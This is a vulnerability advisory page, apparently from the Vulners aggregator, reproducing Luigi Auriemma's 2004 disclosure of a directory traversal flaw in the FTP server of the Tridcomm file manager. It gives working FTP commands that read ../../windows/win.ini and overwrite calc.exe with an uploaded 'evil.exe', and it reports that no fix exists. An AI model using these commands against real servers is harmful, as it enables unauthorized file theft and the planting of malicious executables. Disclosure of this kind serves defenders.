Lucene search
+L

tridcomm13.txt

🗓️ 13 Oct 2004 00:00:00Reported by Luigi AuriemmaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Tridcomm Windows FTP server has a directory traversal vulnerability allowing remote file access.

Code
`  
#######################################################################  
  
Luigi Auriemma  
  
Application: Tridcomm  
http://www.tridcomm.com  
Versions: <= 1.3  
Platforms: Windows  
Bug: directory traversal (both download and upload)  
Exploitation: remote, versus the built-in FTP server  
Date: 06 October 2004  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: http://aluigi.altervista.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
Tridcomm is an open-source 3D file manager for Windows with a built-in  
FTP server disabled by default.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
The built-in FTP server in Tridcomm is vulnerable to a directory  
traversal bug.  
Practically an attacker can watch into any directory and upload and  
download any file in the disk on which Tridcomm is installed.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
dir ../../  
dir /  
  
get  
../../windows/win.ini  
win.ini  
  
put  
evil.exe  
../../windows/calc.exe  
  
(the same examples can be used with the backslash too)  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
No reply from the author.  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.altervista.org  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Oct 2004 00:00Current
7.4High risk
Vulners AI Score7.4
19